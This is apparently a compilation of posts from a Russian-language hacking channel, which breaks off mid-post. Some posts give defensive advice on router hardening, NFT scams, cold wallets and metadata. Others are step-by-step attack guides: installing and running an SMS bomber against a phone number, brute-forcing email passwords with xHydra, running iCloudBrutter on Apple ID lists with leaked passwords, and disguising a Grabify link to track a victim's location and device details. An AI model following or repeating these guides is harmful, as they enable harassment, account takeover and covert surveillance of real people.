Учетные данные администратора по умолчанию находятся в общем доступе для всех пользователей. Если вы никогда не обновляете учетные данные для входа в систему после получения роутера, вас можно считать легкой добычей для хакеров, потому мы настоятельно рекомендуем устанавливать надёжный пароль. Для этого:

Откройте браузер и введите в адресную строку цифры 192.168.0.1. Если ничего не произошло, попробуйте 192.168.1.1 и 10.0.0.1. Далее выскочит окно с полями для логина и пароля.

Введите логин admin и пароль admin. Если не подошли — посмотрите стандартный пароль в инструкции к роутеру или на его корпусе.

Найдите на странице ссылку с надписью Wi-Fi или Wireless. Откроется вкладка, где вы сможете изменить пароль.
Включите WPA2 (защищенный доступ Wi-Fi)

Это самый безопасный на сегодняшний день протокол шифрования. В сочетании с надёжным паролем он даст вам прочную защиту. Вы также можете встретить его другой вариант - это WPA-PSK.

https://i.gyazo.com/eab87ea1c22eff731a0a9c2c11d6c015.jpg

Правильный протокол шифрования не менее важен, чем пароль. Например, устаревший протокол WEP может быть с лёгкостью взломан за пару часов.

Измените сетевое имя вашего роутера (SSID)

Во время настройки роутера также не забудьте изменить SSID. Чтобы хакеры не смогли узнать ваш тип роутера, установите свое собственное сетевое имя. Шифрование WPA использует SSID как часть алгоритма, поэтому избегайте имён по умолчанию, так вы сделаете свою сеть более устойчивой к разным видам взлома.

Отключите WPS

На большинстве роутеров есть WPS (защищенная настройка Wi-Fi), что означает, вы можете нажать кнопку и ввести PIN-код для подключения вместо привычного пароля. Возможно, для кого-то такая функция является очень удобной, но мы не советуем использовать PIN-код вместо пароля. Ведь одним нажатием кнопки WPS, любой сможет подключиться к сети.

К сожалению, не все роутеры поддерживают деактивацию функций WPS, поэтому заранее позаботьтесь о том, чтобы у вашего роутера была такая функция.

Деактивируйте удаленный доступ

Проверьте, подключена ли функция удаленного администрирования на вашем роутере. Она позволяет входить в настройки администратора роутера из любой точки. Деактивировав эту функцию, вы повысите уровень защиты вашего соединения. Как узнать, что удалённый доступ подключён на вашем устройстве?Зайдите в веб-интерфейс и посмотрите, подходит ли стандартная учётная запись admin / admin, если да, то скорее измените пароль.

Заключение

Все выше написанные советы гарантированно обеспечат безопасность вашему Wi-Fi-роутеру, поэтому приступайте к их выполнению прямо сейчас. А в следующей части мы расскажем, как понять, что ваш роутер уже был взломан, и какие меры нужно принять в таком случае.

Удачи!

https://i.gyazo.com/1a5ac89a15b03d586493f5f1ef822dac.jpg

Вступить в наш чат


С растущей популярностью NFT-токенов, набирают обороты разные способы мошенничества, которые становятся все изощреннее. Если вам кажется, что вы знаете о криптоскамерах все, то не спешите уходить, нам есть чем вас удивить.

https://i.gyazo.com/bc6e31e0def1f44b974ff676fcc7dc2a.png



Rug Pull

Схема мошенничества, при которой разработчики забрасывают проект, забирают деньги и уходят в закат. Как правило, разработчики выпускают новую коллекцию NFT, пускают все ресурсы на рекламу проекта и в̶е̶ш̶а̶ю̶т̶ ̶л̶а̶п̶ш̶у̶ ̶н̶а̶ ̶у̶ш̶и̶ красочно рассказывают о планах на развитие. По мере того, как проект набирает популярности среди инвесторов, скамеры удаляют соцсети и оставляют проект без поддержки. Как результат, пользователи, вложившие деньги, остаются с NFT, которые ничего не стоят. Зачастую участниками ****-проекта становятся, ничего не подозревающие, медийные персоны. Для того чтобы привлечь внимание к проекту проводятся различные розыгрыши и раздачи, которые вызывают у людей интерес к проекту. Приведем в пример Флойда Мейвезера, который рекламировал в своем Twitter такие проекты, как Bored Bunny, Ethereum Max, Moonshot.

На Frosties, одном из самых громких ****-проектов в США мошенники заработали 1 млн долларов. Они не выполнили обещаний и исчезли вместе с деньгами инвесторов.

Фишинг

Распространённый способ мошенничества, когда злоумышленники получают доступ к данным пользователей с помощью ссылок на поддельные сайты, имитирующих страницы известных криптопроектов.

Орудуют такие скамеры, как правило, в соцсетях, отправляя рассылки от имени известных NFT-проектов. В таких сообщениях содержатся завлекательные условия, например: скидка на покупку NFT. Однако, при переходе по ссылке, вы попадёте на фишинговый сайт, а при покупке, лишитесь средств со всего кошелька.

В числе жертв фишинговой атаки оказался популярный NFT-художник Beeple. Скамеры взломали его Twitter и разместили ссылку на фейковую коллекцию совместного NFT с Louis Vuitton. В итоге подписчики, решившие купить NFT, лишились денег, а мошенники получили ETH на сумму в 438 тысяч долларов.

Pump Dump

Манипуляция, которая позволяет повысить курс NFT с последующим обвалом цены. Скамеры всеми способами создают ажиотаж вокруг NFT для дальнейшего повышения цены токенов (памп). Затем стоимость токена обесценивается (дамп), и инвесторы теряют деньги.

Логан Пол, актер с 23 миллионами подписчиков на ютубе, стал еще одной медийной личностью, замеченной в продвижении мошеннических проектов. Ему удалось привлечь внимание к таким NFT, как Dink Doink NFT, Crypto Zoo, EMAX и Maverick. Так, их популярность вместе с ценой резко возрастали, а затем падали.

Фейковые коллекции

Мошенники подделывают коллекции известных NFT художников, а затем публикуют их на торговых площадках. Инвесторы думают, что покупают оригинал, а на самом деле это лишь фейк.

С помощью этого способа в апреле 2021 года мошенники умудрились продать коллекции, уже умершей на тот момент, художницы Qinni. Когда ее семья забыла тревогу, скамеры уже завладели кругленькой суммой денег доверяемых подписчиков.

Как не попасться


Внимательно проверяйте домен сайта, к которому подключается кошелек. Дабы не зайти на фишинговый сайт, сохраните в закладках реальные ссылки на площадки, которыми вы пользуетесь;

Если в соцсети какого-то проекта появляется выгодное предложение, не спешите покупать. Проверьте и другие источники, есть вероятность, что аккаунт был взломан хакерами;

Многообещающие предложения о дальнейшем развитии проекта также должны насторожить вас. Чтоб на попасться на схему Rug pull, отдавайте предпочтение проектам с реальными и хорошо распланированными целями;

Смотрите на показатель ликвидности. Высокий объем торгов указывает на то, что коллекция активно покупается и продаётся, а значит вы можете продать NFT на вторичном рынке.
С развитием NFT, появляются и новые способы мошенничества, но знания и умения распознать угрозу помогут вам сберечь средства. Здраво оценивайте все предложения и проверяйте интересующие проекты. Удачи!

https://i.gyazo.com/582ac9f6b0860abcfa6e0bcbfd2b2560.jpg

Вступить в наш чат


В прошлой статье мы рассказали, как защитить свой роутер от хакеров, и чем опасен взлом. Но как понять, что ваша сеть стала уязвимой, и как вернуть над ней контроль? Обо всем по порядку.

Мы надеемся, что вы учли и предприняли все наши советы по безопасности роутера, но если вы всё-таки заметили подозрительную активность на вашем ПК или просто хотите убедиться, что с вашим Wi-Fi все в порядке, то советуем обратить внимание на следующие признаки, свидетельствующие о том, что вас хакнули.

https://i.gyazo.com/2f5bd3f233a1761c998811125a9db3bf.jpg

Как понять, что ваш роутер взломан:

В сети Wi-Fi появились новые устройства. Чтобы узнать, подключалось ли к сети неизвестное устройство, войдите в свой роутер и проверьте список IP-адресов в вашей сети на наличие иных подключений.

Изменились настройки DNS. Хакеры часто меняют настройки для подключения к вредоносным серверам, которые крадут ваши персональные данные и даже заражают устройство вирусами. Для того, чтобы узнать к какому серверу подключается ваш ПК, зайдите в DNS настройки вашего роутера в меню администратора.

Учетные данные администратора изменились. Если вы не можете подключиться к сети Wi-Fi, то логично предположить, что хакеры поменяли пароль и учетные данные вашего роутера, тем самым лишили вас доступа к Интернету.

Скорость интернета упала. Хотя причин этому очень много, но, если вы проверили все параметры, а скорость так и не увеличилась, то есть вероятность, что злоумышленник использует пропускную способность вашего Wi-Fi.

Вредоносное ПО. Наличие вируса - это повод бить тревогу. Если вы не могли самостоятельно подцепить вредоносную программу, то скорее всего кто-то это сделал за вас.
Если вы обнаружили на своём устройстве более 2-х вышеназванных пунктов, то ваш роутер скорее всего взломали.

Как вернуть контроль над устройством:

Выполнив следующие действия, вы не только избавитесь от хакеров, но и очистите свой компьютер от вредоносного ПО.

Выключите роутер

Первым действием требуется разорвать соединение между вашим устройством и хакером. Для этого отсоедините интернет-кабели и на время отключите все устройства, подключённые к Wi-Fi.

Сбросьте роутер до заводских настроек

Все роутеры оснащены специальной кнопкой сброса, вам, возможно, пригодится скрепка или иголка, чтобы нажать на нее.

Сброс к заводским настройкам удаляет все изменения параметров роутера, в том числе все сетевые настройки, которые были ранее установлены. Если злоумышленнику известен пароль и учетные данные администратора, то они станут недоступны после сброса.

Измените учетные данные администратора

После сброса восстановите заводские настройки по умолчанию. На самом роутере или в руководстве записаны логин и пароль для входа, используйте их. Однако, сразу же поменяйте их на сложную комбинацию букв и цифр, состоящих не менее чем из 15 символов, дабы избежать повторной атаки.

Установите SSID и пароль Wi-Fi

Помните, что сложные названия и пароли защищают вашу сеть от взлома.

Обновляйте прошивку

Не все роутеры автоматически обновляют прошивку, поэтому лично позаботьтесь об этом. Зайдите в меню администратора -> настройки прошивки и обновите ее до новейшей версии. Любые хакерские атаки, нацеленные на вашу старую прошивку, должны стать неэффективными. Раз в пару месяцев проверяйте наличие новых прошивок и обновляйте их.

В дальнейшем любые атаки на ваш роутер станут неэффективными.

Удачи!

https://i.gyazo.com/3ca8c5f7a695aefafdf499bb5683fce1.jpg

Вступить в наш чат



Сегодня мы расскажем вам о карманной альтернативе Linux на iOS, и как с помощью неё устроить бомбер атаку всего за 5 минут.

iSH Shell- это приложение в AppStore, которое может стать полноценным эмулятором линукс на вашем яблочном гаджете.

Первым делом заходим в AppStore и скачиваем программу iSH Shell.


https://i.gyazo.com/9029f3288da9a75fe71fb34cf78736ca.jpg



Открываем приложение и начинаем по отдельности вводить команды.
Обновим в терминале список пакетов:



apk update



https://i.gyazo.com/446d4fc0703c9d8ab50cb779a42e2c2f.jpg





apk upgrade




apk add git


Для работы смс-бомбера потребуется python:



apk add python




apk add python3


Так же pip3:



apk add py3-pip


Далее установим requests и colorama:



pip3 install requests




pip3 install colorama


После загрузки вышеуказанных компонентов, перейдем к самому бомберу:



git clonehttps://github.com/termux-lab/smsham.git


Когда скрипт завершит установку, запускаем его:



cd smsham




python3 smsham.py


Готово. Теперь вас попросят ввести номер телефона. Вводим и подтверждаем с помощью enter.

Чтобы остановить работу бомбера, нажмите ctrl + z.
Заключение
iSH Shell - настоящая находка для карманного хакинга на вашем apple устройстве. При желании вы можете найти большое количество применений для данной программы, которые не будут уступать Linux. В следующей же части вы узнаете, как с помощью iSH cделать DDoS атаку.

Удачи!

Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.

https://i.gyazo.com/0c69f3aa76e620c843bfe0a8b1ecf8bc.jpg

Вступить в наш чат


Когда речь заходит про криптовалюту, мнения единогласно сходятся в том, что самым безопасным способом её хранения является холодный кошелёк. В любой системе хранения, работающей через Интернет, может случиться сбой, именно поэтому холодные кошельки так пользуются популярностью. Сегодня мы наглядно расскажем, как можно создать свой холодный кошелек для криптовалюты, используя USB-накопитель и Tails.

https://i.gyazo.com/bf26b27871c584fe258d0bd706148681.jpg

Холодный кошелёк хранит ваш закрытый ключ и другие данные без использования Интернета, что и делает его более надёжным.

К холодному способу хранения относятся аппаратные кошельки, например Ledger и Trezor, но их главный минус - это цена. Не все готовы платить по 15000 тысяч рублей, поэтому обычный USB-накопитель может стать достойной альтернативой.

Почему Linux

В отличие от Windows, Linux имеет более продуманную систему безопасности. В Windows то и дело встречаются шпионское модули, вирусы, кейлогеры, а на сервера Microsoft пересылаются скриншоты, которые вы никак не можете отключить. Если вы точно хотите обеспечить себе максимальную анонимность, то обязательно устанавливайте холодный кошелёк на Linux.

Почему Tails

Tails является дистрибутивом Linux и по умолчанию использует сеть Tor. Помимо этого, там уже установлен кошелек Electrum, который нам и потребуется для работы.

Что нам понадобится


два USB-накопителя;

Скаченный дистрибутив Tails (Скачивайте с официального сайта);

Программа Rufus для записи Linux на USB (не используйте другие программы для записи Linux, только Rufus).
Установка

Итак, на первую флешку загружаем Tails и затем вставляем вторую.

Заходим в меню и выбираем Tails Installer.

https://i.gyazo.com/13841d8a206e949528dfd663cb6d5acf.jpg

Выберите клонирование Tails и загрузите на вторую флешку.

https://i.gyazo.com/83ec16e3c311c57c915dfa304b05434a.jpg

Создание USB с Tails для хранения данных

Если вы просто запишите Tails на USB, то вы не сможете хранить вашу личную информацию. Для этого нам и нужен второй USB-накопитель.

Откройте меню и нажмите Configure persistent volume (Настройка хранилища данных)
https://i.gyazo.com/e6dc4be8f48848eb83888ea483125b2e.jpg

С помощью бегунка выберите те данные, которые вам понадобятся.

https://i.gyazo.com/2ea45a27ce7d773eb45b2bd857bffa0d.jpg

Создание ключей и настройка Electrum

Прежде всего, кошельку необходимо присвоить имя. Если у вас есть стандартный кошелек с двухфакторной аутентификацией, мультиподписью или предварительно подготовленный кошелек, вы можете импортировать его.

Мы же будем создавать стандартный кошелек.
https://i.gyazo.com/1fcfceef1deea3e94c4a7c856f2195f5.png

https://i.gyazo.com/5014c9c4dc1fe26b4d1b76cae2406b96.png


Создадим новый сид. Это алгоритм, который генерирует список из 12 слов — закрытый ключ. Слова необходимо записать по порядку, хранить в надежном месте и никому никогда не сообщать.
https://i.gyazo.com/4c3afbc9333b4f830a61d329ad59fa02.png

https://i.gyazo.com/e2fc28dca9ed822aa45910dc93b396bf.png

Теперь введём данные слова по порядку, после чего будет запрошен пароль для повторного шифрования кошелька.

https://i.gyazo.com/9653661e26ec478e5f4ae0226af87232.png


Чтобы посмотреть публичный ключ и другую информацию о кошельке, зайдите во вкладку Информация о кошельке.
https://i.gyazo.com/213515e1ff9d69774807684f3e3ab13d.png

Ваш кошелёк Electrum готов. Для других криптовалют необходимо использовать разные кошельки, которые вы таким же способом можете скачивать и устанавливать в систему.

Удачи!

https://i.gyazo.com/a3389eb46882b2190e03817600bbb932.jpg

Вступить в наш чат


В наши дни почта - это не просто самостоятельный инструмент, а скорее ключевое звено, которое даёт доступ ко всем сервисам, социальным сетям и многому другому. Взломав почту, вы получите доступ ко всему. В сегодняшней статье мы поговорим про отнюдь не новый, но действенный способ взлома паролей. Он является универсальным и может быть применён ко всем почтовым сервисам. Речь пойдет про ***** в Kali Linux.

https://i.gyazo.com/1a6deb54a7d0cc2089a060e84fd15dfa.jpg

xHydra - это многозадачный брутфорсер паролей с открытым исходным кодом, с помощью которого мы подберем пароль для одной тестовой почты. Это бесплатное приложение, которое можно скачать с GitHub. Но если вы знакомы с Kali Linux,то вам известно, что ***** является встроенным инструментом, поэтому установку выполнять не нужно.

Взлом почты

1. Запускаем графическую оболочку скрипта xhydra.

2. В новом окне, во вкладке «Target» прописываем в строке «Single Target» адрес smtp-сервера исходящей почты нужного сервиса. Порт 465 и протокол выбираем соответственно SMTP. Ставим галочку использовать SSL-соединение. И отмечаем пункт, отвечающий за отображение результатов брутфорса в реальном времени.

https://i.gyazo.com/2470b7180b95c903de6e95a089e5e81b.png

3. В соседней вкладке «Password» указываем почту, которую будем брутфорсить. В пункте Password указываем путь к словарю. Найти словари для брутфорса можно в любом поисковике. Также ставим отметку, отвечающую за проверку логина в качестве возможного пароля.

https://i.gyazo.com/360e3c8da059f8c7715153aece12563f.png

4. В «Tuning»меняем метод на HTTP.

5. Во вкладке «Specific» пишем полной адрес почтового сервиса, где находится наш ящик.

https://i.gyazo.com/238b53966c30474137b028588967f5a1.png

6. Жмём на «Start». Перебор паролей запущен. Если брут успешный, то программа выдаст сообщение о том, что пароль подобран, как в нашем случае.

https://i.gyazo.com/f0a60c943e6751f5e4c279ccd33b7af1.png

А ваша почта надёжно защищена?

Информация в этой статье предоставлена в ознакомительных целях. Мы не призываем к действию.

https://i.gyazo.com/20c387f0dc063473cb019d6fe97d2898.jpg

Вступить в наш чат



Метаданные — данные, относящиеся к дополнительной информации о содержимом или объекте. Метаданные раскрывают сведения о признаках и свойствах, позволяющие автоматически искать и управлять ими в больших информационных потоках.


Как работают метаданные

Например, вы хотите скинуть фото на форум. Однако помимо фото, интернет получит много интересной информации о вас: когда был сделан снимок, а также данные GPS, по которым без труда можно вычислить местоположение. Особенно интересно, если фото было сделано из вашего дома.

https://i.gyazo.com/2b1270ba884292242c60e11e8338f0f3.png

Как вы понимаете, метаданные содержат огромное множество информации о вас. Для того, чтобы обеспечить свою безопасность и оставаться анонимным в сети, необходимо удалять метаданные. В этой статье разберём способ их удаления.

https://i.gyazo.com/d6ea2ba35d9297bf22b06fb7fa197fdf.png

Как удалить метаданные

Проще всего: скачать специальное приложение. Таких приложений становится всё больше. В этой статье разберём одно из самых популярных — Metadata Cleaner.

Metadata Cleaner позволяет просматривать метаданные в ваших файлах и удалять их. Устанавливаем приложение, интерфейс интуитивно понятен.


Добавляем файлы


https://i.gyazo.com/5a74b6130038254c689ca9f924d5c452.png

2. Приложение позволяет просматривать, какие метаданные содержит файл.

https://i.gyazo.com/adb62dbba3b33fead92c304e902b1d24.png

3. Удаляем метаданные. Можно сразу у всех файлов.

https://i.gyazo.com/ce43a5f0922c2c526c4420514a6e271e.png

https://i.gyazo.com/1153ae5a4f5a82ac79a1f43daab40f16.jpg

Вступить в наш чат


Согласно CNBC, в 2021 году в Метавселенной было продано недвижимости на $501 млн, а в 2022 году продажи превысили $85 млн. При таком дальнейшем спросе они превысят $1 млд к концу года. Это лишний раз доказывает, что Метавселенная находится на пике популярности, вместе с этим она развивается и появляются новые тренды, такие как Интернет тела и взламываемые люди.

Всего пару лет назад основатель ВЭФ К. Шваб заявил, что благодаря Метавселенной человек сможет достичь слияния на физическом, биологическом и цифровом уровне. А в прошлом году Марк Цукерберг сказал, что в скором времени нейроинтерфейсы станут обязательной частью взаимодействия человека с Метавселенной, появятся новые устройства, позволяющие полностью погрузится в процесс и сделать его более живым и естественным.

https://i.gyazo.com/4c175f2244b01bd026b718dc7309d81a.jpg

Интернет тела

Речь идёт о «Интернет телах» (IoB) - это технология, которая позволяет совершать действия при помощи мыслей, памяти. Интернет тела способны объединить тело человека с датчиками, которые передают информацию по сетям. Они включают в себя медицинские и биометрические данные.

Нейронные интерфейсы будут очень важной частью AR-очков, или EMG-вход от мыши на запястье будет сочетаться с ИИ.

Благодаря Интернет телу человеку откроются огромные возможности, которые помогут полностью погрузится в цифровое пространство. За счёт накопления биометрических данных в Метавселенных через какое-то время можно будет взламывать и программировать человеческое тело.

Хакинг людей в Метавселенной

Еще в 2020 году историк Юваль Харари отметил, что человек больше не является загадкой природы, он становится животном, которого можно взломать. И для того, чтобы хакнуть человека нужно завладеть только его биологическими данными и соответствующей вычислительной мощностью.

Харари представил формулу, которая может послужить основой для будущего взламывания человека. Вот эта формула — B x C x D = A**. Она означает, что биологические знания, умноженные на вычислительную мощность, умноженную на данные, равны способности взламывать людей. Харари уверен, в скором времени правительство и компании начнут взламывать население, так как уже имеют большую базу данных о каждом из нас. И в этом процессе Метавселенные могут стать тем самым инструментом для хакинга. Чем больше людей подключатся к Метавселенным, тем больше информации можно собрать. А чем больше устройств, тем больше возможностей открываются для тех, кто собирает и управляет ими.

Время Интернет тел и взламывания уже наступило. Бесчисленное количество устройств собирает данные о пользователях. Например, медицинские учреждения, они хранят огромные базы данных о состоянии здоровья пациентов. Клиники уже сталкиваются с попытками взлома и похищения информации. Нет никаких гарантий, что хакеры могут работать на правительства разных стран, которым нужен доступ к таким базам данным.

Учитывая тот факт, что уже некоторые клиники открывают офисы в Метавселенных, количество поступаемой информации о клиентах вырастет в разы. Они могут быть использованы в самых разных целях, в том числе и для хакинга.

При слиянии на биологическом, цифровом и физическом уровне, навигация по Метавселенной потребует от каждого обладать личным аватаром, чтобы войти в систему. Контроль за ним будет осуществлять система, а не сам человек.

Заключение

Метавселенные дают уникальные возможности для творчества, работы, развлечений. Однако, они же и собирают о пользователях множество данных, которые могут быть использованы против самого человека.

https://i.gyazo.com/f007ba127e66d2af08056ce791b3471e.jpg

Вступить в наш чат



Если вы хотите отследить чьё-то местоположение, собрать данные о пользователе, то это статья для вас. Сегодня мы покажем вам, как это можно провернуть с помощью простой ссылки.

Для того, чтобы создать шпионскую ссылку, мы будем использовать сайт Grabify. Перейдя по ней, сайт автоматически соберет о жертве личные данные, в том числе и IP.

https://i.gyazo.com/630cbdce7080012a0ce6838b9ea903d0.png

Самое важное в этом деле - выбрать правдоподобную ссылку, по которой человек точно захочет перейти. Это может быть видео с ютуба или мемная картинка, нет никаких ограничений. Какую ссылку вы выберете, зависит от вас. Вам лишь нужно подобрать что-то убедительное и подходящее к конкретной ситуации.

Создание шпионской ссылки

Шаг 1 - Подготовка

Откройте веб-браузер и перейдите на сайт grabify.link.

Этот сайт бесплатный, поэтому платить ни за что не нужно.

Шаг 2 - Создаем учетную запись Grabify

Создайте учетную запись на Grabify. Вы также можете использовать временную почту, если хотите. Пройдите регистрацию и подтвердите ее в сообщении, отправленном по почте.

https://i.gyazo.com/a7d4fa50b1c25734bccdb1aebe2041d1.jpg

После того, как вошли в учётную запись, вы должны увидеть страницу, как показано ниже.

https://i.gyazo.com/657b37cd167de900b8366ca478bc9e93.jpg

Шаг 3 - Создаём URL для отслеживания

https://i.gyazo.com/47a2b494ea74c40fa6c50899b77b032a.jpg

В начале статьи мы попросили вас хорошенько подумать насчёт убедительной ссылки, по которой жертва 100% захочет перейти. Будьте креативными.



Примечание: это должно быть что-то простое и не должно вызывать подозрений.

Помимо этого, обязательно выберите опцию «Smart Logger», это поможет собрать еще больше информации о пользователе.

https://i.gyazo.com/1f900557ee50ed9bb0200b4438ed438b.jpg

Шаг 4 - Скрываем ссылку для отслеживания

Название Grabify в имени URL-адреса может показаться подозрительным, поэтому убедитесь, что вы используете функцию сокращения. Вы можете использовать ссылку с любым количеством сокращателей URL, которые доступны прямо в Grabify, как показано ниже.

https://i.gyazo.com/598bbaa061c5686933e3d450e218d380.jpg

Если сокращатели по умолчанию не соответствуют вашим потребностям, вы всегда можете создать собственную ссылку с помощью пользовательской панели ссылок, как показано ниже.

https://i.gyazo.com/9b29ab12c1b46067e3364b8849881f3e.jpg

Нажмите либо на «Click here», либо на «Change domain/Make a custom link» в поле «New URL». Теперь проверьте параметры «Extension» в открывшемся меню.

https://i.gyazo.com/7f223cb8d09afac8445cbef4811d1c7e.jpg

Шаг 5 - Отправляем ссылку

Есть много вариантов, как это можно сделать. Самый распространенный — отправить ссылку в социальных сетях или мессенджерах. Используйте социальную инженерию, чтобы убедить человека нажать на неё.

Как только цель нажимает на ссылку, вы получаете информацию о IP-адресе и другие личные данные, такие как дата и время, местоположение, информация о батарее, язык, часовой пояс, разрешение экрана, браузер, интернет-провайдер и операционная система.



Поздравляем, вы успешно научились отслеживать чье-либо местоположение с помощью одной лишь ссылки. Успехов!

https://i.gyazo.com/306ba48e0b8a8667ff3ef372ca7a55b8.jpg

Вирусы, они везде

Рассказываем в нашей авторской статье - возможно ли поймать вирус, сканируя QR-код.

Как проверить QR-код на вирусы



Вступить в наш чат




Каждый знает, что нельзя переходить по левым ссылкам в интернете. Для того, чтобы поймать вирус иногда достаточно просто попасть на сайт. Причём порой даже официальные адекватные сайты могут быть взломаны. Многие опытные пользователи уже давно не переходят по подозрительным ссылкам и не важно, где они наткнулись на них: письмо на почте, кто-то скинул в лс, увидели на форуме или даже пришло смс на мобильный телефон. Но что насчёт QR-кодов? В данной статье узнаем, как проверить QR-код на наличие вирусов.

Интересно, что люди легко сканируют любые QR-коды так, словно к ним больше доверия. Однако, QR-код — та же самая ссылка только в другом виде. Она точно так же может нести в себе угрозу.

QR-коды теперь повсюду. К сожалению, QR-коды могут быть не такими безопасными, как вы думаете, особенно потому, что URL-адреса скрыты, и почти невозможно сказать, куда они вас приведут, если вы их отсканируете.

Вы можете узнать, безопасен ли QR-код, прежде чем получить к нему доступ.Как проверить QR-код

Проверить QR-код поможет сервис RevealQR.

Плюсы:

1. Простая и быстрая регистрация, можно зайти через аккаунт Google

2. В сервис можно загрузить как уже сделанное фото, так и сделать в режиме онлайнКак работает сервис

RevealQR декодирует URL-адрес, хранящийся в QR-коде, и отправляет его на ведущую платформу анализа вредоносных программ VirusTotal.

https://i.gyazo.com/3ac8cd6769e0e46f224e5c6aeb354bae.png

Всё просто:
Регистрируемся

Сканируем код

Получаем информацию о QR-коде
https://i.gyazo.com/de47e6b214089ba4df74419e3beebce9.png

Однако, стоит помнить, что ни один сервис не даст 100% информации. Даже если сервис не считал код опасным, следует быть осторжным.

https://i.gyazo.com/cfcf24c82f48e603ebfef11b7e7ac011.jpg

Вступить в наш чат


Apple — крупнейшая компания, спускающая миллиарды долларов на защиту и конфиденциальность своих устройств. Однако, времена изменились, и поэтому яблочные устройства все чаще подвергаются хакерским атакам. Так, ещё в 2019 году Google’s Project Zero сообщили о массовых взломах Apple устройств: для этого были использованы вредоносные сайты, перейдя по которым, устройство взламывалось. В сегодняшней статье мы расскажем вам, как хакнуть Apple ID, и как пользователям яблок защититься от взломов.

https://i.gyazo.com/f13424ee8ba7b3539c1f5cea35e3989a.jpg

Что такое Apple ID

Apple ID представляет из себя учетную запись, которая даёт доступ ко всем функция Apple. По сути, это центр управления всем устройством, который позволяет вам удаленно управлять IPhone, загружать и обновлять программное обеспечение, создавать резервные копии данных, искать и блокировать устройство и многое другое.

Как взломать Apple ID

Для того, чтобы хакнуть Apple ID, мы будем использовать инструмент iCloudBrutter. Это простой скрипт Python для выполнения атаки методом перебора паролей.


Вся информация предоставлена в ознакомительных целях. Мы не несём ответственности за ваши действия.

Итак, начнём:

Клонируйте инструмент iCloudBrutter с помощью команды git-clone:
git clone https://github.com/m4ll0k/iCloudBrutter.git
Теперь также измените каталог на icloudbuster:
cd iCloudBrutter
Чтобы использовать этот инструмент, вам также необходимо установить следующее:
pip3 install requests, urllib3, socks
Если pip3 не установлен, используйте следующую команду для его установки:
sudo apt-get install python3 python3-pip php ssh git
Теперь, чтобы запустить инструмент и начать взламывать учетные записи Apple ID, введите следующее:
python3 icloud.

https://i.gyazo.com/8a17021fa4fce2befe04677611c2a97d.jpg


Далее пишем последнюю команду:
python3 icloud.py --idw /root/Desktop/Apple.txt --wordlist /root/Desktop/pass.txt

https://i.gyazo.com/a6846038d6c4969c3742710c3ae7bd2c.jpg

Здесь apple.txt содержит учётные записи Apple, а pass.txt — список часто используемых паролей и тех, которые сливаются в сеть хакерами. Вы легко можете найти и скачать такие списки в Интернете, просто введите запрос: «passwords for bruteforce».

Вывод

Метод взлома с помощью брутфорса не является 100% рабочим, так как успех будет гарантирован лишь в том случае, когда пользователь установит слабый пароль. Подводя итог, хотелось бы отметить, что единственной защитой от взломов неизменно остаётся надёжный пароль. Именно уникальный и сильный пароль - это гарант безопасности ваших личный данных. Удачи!

https://i.gyazo.com/e6d6209f286d31cea2c4f6b7dd01657d.jpg

Вступить в наш чат


Что обычному человеку хорошо, то хакеру –– смерть. Очевидно, что требования разных пользователей к компьютеру сильно разнятся. Но самое сильное отличие - это операционная система. Большинство хакеров скептически относятся к Windows поскольку считают ее медленной, неудобной и совсем небезопасной по сравнению с другими системами. И именно поэтому, мы подготовили для вас наш топ-5 лучших ОС для хакеров.

1. Kali Linux

Kali Linux — это программное обеспечение с открытым исходным кодом, которое доступно абсолютно бесплатно. Хакеры отдают предпочтение этой ОС, потому что она имеет более 600 инструментов тестирования проникновения и большое количество поддерживаемых языков. Поскольку это программное обеспечение с открытым исходным кодом, весь его код доступен на GitHub для настройки. Некоторые функции Kali Linux: Wifite2, Nessus, Aircrack-ng, Netcat, инструменты судебной экспертизы, NetHunter и многие другие.

2. BackBox

https://i.gyazo.com/15b8c23a38549193caa45d4b90c4cf59.jpg

BackBox — это проект сообщества с открытым исходным кодом, который продвигает культуру безопасности в ИТ-среде и делает ее лучше и безопаснее. Это дистрибутив Linux для тестирования на проникновение на основе Ubuntu. Многие хакеры предпочитают BackBox любой другой ОС, потому что в ней есть инструменты безопасности для самых разных целей, таких как анализ сети, анализ веб-приложений, компьютерный криминалистический анализ, оценка уязвимостей и т. д.

3. Parrot Security OS

https://i.gyazo.com/ed8b5e7a32d2ef0c4f2668c7a066478f.jpg

Parrot OS — это продукт Parrot Security, дистрибутив GNU/Linux, основанный на Debian. Эта операционная система предназначена для обеспечения безопасности и конфиденциальности. Хакеры любят работать с Parrot ОС из-за ее полного переносимого арсенала услуг ИТ-безопасности и цифровой криминалистики. Parrot поддерживает платформы Anosurf, FALON 1.0, Qt5, .NET/mono, LUKS, Truecrypt и VeraCrypt. Также у Parrot OS есть интересные функции, такие как полная анонимность, криптография, песочница, программирование и разработка, аппаратный взлом и т.д.

4.DEFT Linux

https://i.gyazo.com/41391cb0fa5a4fd229ca08cf8a729eed.jpg

DEFT — это бесплатное программное обеспечение с открытым исходным кодом, разработанное на платформе Linux Ubuntu и оснащенное удобным графическим интерфейсом. В продукт добавлен набор профильных утилит, начиная антивирусами, системами поиска информации в кэше браузера, сетевыми сканерами и другими различными утилитами, заканчивая инструментами, которые необходимы при проведении поиска скрытой информации на диске. Предназначен для компьютерной криминалистики и информационной безопасности.

5. Samurai Web Testing Framework

https://i.gyazo.com/a39b01fbb2660451b66b31f3d084df48.jpg

Samurai Web Testing Framework— это операционная система для хакеров, которая имеет лучшие инструменты для тестирования и атаки веб-сайтов. Имеет открытый исходный код, предоставляется бесплатно. Особенности Samurai WTF заключаются в том, что он оснащен SVN и имеет инструменты WebApp Pentest: Burpsuite, SQLMap другие. В качестве основы использует Ubuntu.

https://i.gyazo.com/5b3b8628dcdf903bdff47c2efadacaff.jpg

Вступить в наш чат

Возможно вы иногда замечали такие сообщения, которые вы вроде как не открывали, но в мессенджере стоит статус «прочитано». Или же просто вам кажется, что кто-то следит за диалогом. Часто бывает, что такие мысли — это не просто паранойя.

Наверняка у каждого однажды закрадывалось сомнение — а не читает ли кто-то мои переписки? Сегодня расскажем про способ, который поможет опровергнуть или подтвердить мысли о приглядывании за вами.

Как проверить слежку

В основе данного способа лежит всем известный сервис privnote.com. Он создаёт самоуничтожающиеся записки, но у сервиса так же есть функция оповещения о прочтении. Она и будет выступать капканом для того, чтобы проверить, не просматривает ли кто-то третий ваш диалог.


Создаем заметку с любым текстом. Можно даже с какой-то зловещей фразой, чтобы возможный следопыт почувствовал себя некомфортно:


